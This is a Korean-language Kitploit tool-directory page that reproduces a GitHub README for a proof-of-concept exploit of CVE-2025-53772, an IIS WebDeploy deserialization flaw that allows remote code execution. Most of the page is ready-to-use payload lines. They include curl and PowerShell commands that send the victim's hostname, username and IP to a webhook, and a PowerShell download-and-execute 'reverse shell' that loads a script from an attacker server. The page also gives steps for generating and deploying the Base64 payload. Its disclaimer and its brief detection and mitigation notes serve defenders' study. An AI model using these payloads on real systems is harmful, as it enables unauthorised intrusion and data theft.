Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-53772-IIS-WebDeploy-RCE — CVE-2025-53772에 대한 개념 증명 익스플로잇, IIS WebDeploy의 안전하지 않은 역직렬화를 통한 원격 코드 실행 취약점입니다. 정보 수집, 명령 실행, 리버스 셸을 위한 사용자 정의 가능한 페이로드 생성을 포함합니다. | Kitploit
도구/GitHubGitHub/momollax/cve-2025-53772-iis-webdeploy-rce
ExploitationWeb Application ExploitationCommand and ControlLearning & EducationRemote Access ToolPayload Development
GitHubmomollax/cve-2025-53772-iis-webdeploy-rce

CVE-2025-53772-IIS-WebDeploy-RCE

CVE-2025-53772에 대한 개념 증명 익스플로잇, IIS WebDeploy의 안전하지 않은 역직렬화를 통한 원격 코드 실행 취약점입니다. 정보 수집, 명령 실행, 리버스 셸을 위한 사용자 정의 가능한 페이로드 생성을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
5711개월 전아직 검토되지 않음

CVE-2025-53772 - IIS WebDeploy RCE 익스플로잇

이 저장소는 CVE-2025-53772에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 IIS WebDeploy의 안전하지 않은 역직렬화를 통한 원격 코드 실행 취약점입니다.

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 저자는 이 소프트웨어로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 소유하고 있거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오.

🔧 빠른 설정

1. 페이로드 사용자 정의

poc.cs 파일의 18-19행에서 페이로드를 편집하여 대상 작업을 지정하십시오:

root@kitploit:~
// Replace with your webhook URL and desired payload
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");

📋 페이로드 예제

정보 수집 (권장):

root@kitploit:~
set.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");

간단한 명령 실행:

root@kitploit:~
set.Add("cmd.exe");
set.Add("/c calc.exe");  // Opens calculator

리버스 쉘 (고급):

root@kitploit:~
set.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");

2. 익스플로잇 페이로드 생성

GitHub Action이 자동으로 PoC를 컴파일하고 Base64로 인코딩된 페이로드를 생성합니다:

  • 변경 사항을 푸시하여 GitHub Action 트리거
  • 저장소의 Actions 탭으로 이동
  • 최신 워크플로우 실행 클릭
  • 콘솔 출력에서 생성된 페이로드를 찾으세요:
GitHub Actions payload output
  1. 익스플로잇 배포 취약한 IIS WebDeploy 엔드포인트에 생성된 Base64 페이로드를 사용하세요: Payload deployment example

🎯 취약점 세부 정보

  • CVE ID: CVE-2025-53772

  • 영향을 받는 소프트웨어: IIS WebDeploy (여러 버전)
  • 취약점 유형: RCE로 이어지는 안전하지 않은 역직렬화
  • 공격 벡터: 원격, 인증 없음
  • 심각도: 치명적

🛠️ 수동 컴파일 (선택 사항)

GitHub Actions 대신 로컬에서 컴파일하려면:

root@kitploit:~
# Windows with .NET Framework
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs
poc.exe > payload.txt

## Or with Visual Studio
csc poc.cs
poc.exe

📡 웹훅 설정

  • webhook.site로 이동하여 무료 웹훅 URL 받기
  • 페이로드의 YOUR-WEBHOOK-ID를 고유 ID로 바꾸세요
  • 들어오는 요청을 모니터링하여 익스플로잇 실행 결과 확인

🔍 탐지 및 완화

탐지:

  • 비정상적인 BinaryFormatter 역직렬화 활동 모니터링
  • IIS 작업자 프로세스에서 의심스러운 프로세스 생성 확인
  • 예상치 못한 아웃바운드 연결에 대한 네트워크 모니터링

완화:

  • IIS WebDeploy를 최신 패치 버전으로 업데이트
  • 입력 검증 및 삭제 구현
  • 역직렬화 유형에 대한 허용 목록 사용
  • 네트워크 분할 및 모니터링 배포

📚 참고 자료

  • CVE-2025-53772 상세 정보
  • Microsoft 보안 권고
  • NIST 취약점 데이터베이스
도구 다운로드